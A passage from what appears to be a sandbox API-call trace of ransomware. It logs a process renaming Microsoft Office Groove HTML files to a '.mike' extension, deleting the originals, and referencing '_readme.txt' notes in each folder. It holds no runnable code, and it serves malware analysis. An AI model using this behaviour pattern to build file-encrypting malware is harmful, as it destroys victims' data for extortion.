lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime", lpFilePart=0x0) returned 0x63 [0077.226] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.226] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.226] CoTaskMemFree (pv=0x506980) [0077.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis", lpFilePart=0x0) returned 0x64 [0077.227] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.227] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.228] CoTaskMemFree (pv=0x506980) [0077.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate", lpFilePart=0x0) returned 0x64 [0077.228] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.228] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.228] CoTaskMemFree (pv=0x506980) [0077.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue", lpFilePart=0x0) returned 0x67 [0077.229] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.229] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.229] CoTaskMemFree (pv=0x506980) [0077.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen", lpFilePart=0x0) returned 0x6a [0077.230] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.230] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.230] CoTaskMemFree (pv=0x506980) [0077.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.231] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2", lpFilePart=0x0) returned 0x63 [0077.232] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.232] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.232] CoTaskMemFree (pv=0x506980) [0077.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.232] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl", lpFilePart=0x0) returned 0x64 [0077.233] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.233] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.233] CoTaskMemFree (pv=0x506980) [0077.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5", lpFilePart=0x0) returned 0x52 [0077.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.238] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html.mike", lpFilePart=0x0) returned 0x6b [0077.238] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html", lpFilePart=0x0) returned 0x66 [0077.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html.mike", lpFilePart=0x0) returned 0x6b [0077.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html.mike", lpFilePart=0x0) returned 0x6b [0077.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html", dwFileAttributes=0x80) returned 1 [0077.242] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsblankpage.html")) returned 1 [0077.243] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.245] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.245] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html", lpFilePart=0x0) returned 0x6b [0077.249] WriteFile (in: hFile=0x288, lpBuffer=0x2191d10*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2191d10*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.249] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html.mike", lpFilePart=0x0) returned 0x70 [0077.249] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html.mike", lpFilePart=0x0) returned 0x70 [0077.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 1 [0077.250] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsbrowserupgrade.html")) returned 1 [0077.251] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.254] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html.mike", lpFilePart=0x0) returned 0x6c [0077.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html", lpFilePart=0x0) returned 0x67 [0077.260] WriteFile (in: hFile=0x288, lpBuffer=0x21a1ccc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21a1ccc*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.261] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html.mike", lpFilePart=0x0) returned 0x6c [0077.261] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html.mike", lpFilePart=0x0) returned 0x6c [0077.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html", dwFileAttributes=0x80) returned 1 [0077.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formscolorchart.html")) returned 1 [0077.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.264] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.264] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html.mike", lpFilePart=0x0) returned 0x6e [0077.265] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html", lpFilePart=0x0) returned 0x69 [0077.269] WriteFile (in: hFile=0x288, lpBuffer=0x21b7170*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21b7170*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.269] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html.mike", lpFilePart=0x0) returned 0x6e [0077.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html", dwFileAttributes=0x80) returned 1 [0077.269] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsformtemplate.html")) returned 1 [0077.271] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.272] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html.mike", lpFilePart=0x0) returned 0x71 [0077.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html", lpFilePart=0x0) returned 0x6c [0077.276] WriteFile (in: hFile=0x288, lpBuffer=0x21cc77c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21cc77c*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html.mike", lpFilePart=0x0) returned 0x71 [0077.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html.mike", lpFilePart=0x0) returned 0x71 [0077.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html", dwFileAttributes=0x80) returned 1 [0077.277] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsformtemplatertl.html")) returned 1 [0077.278] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.280] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.280] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.280] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html", lpFilePart=0x0) returned 0x6a [0077.284] WriteFile (in: hFile=0x288, lpBuffer=0x21deab0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21deab0*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html", dwFileAttributes=0x80) returned 1 [0077.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsimagetemplate.html")) returned 1 [0077.286] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.288] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html", lpFilePart=0x0) returned 0x6a [0077.292] WriteFile (in: hFile=0x288, lpBuffer=0x21f0bc8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21f0bc8*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html.mike", lpFilePart=0x0) returned 0x6f [0077.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html", dwFileAttributes=0x80) returned 1 [0077.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsmacrotemplate.html")) returned 1 [0077.293] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.295] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html.mike", lpFilePart=0x0) returned 0x71 [0077.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html", lpFilePart=0x0) returned 0x6c [0077.301] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft 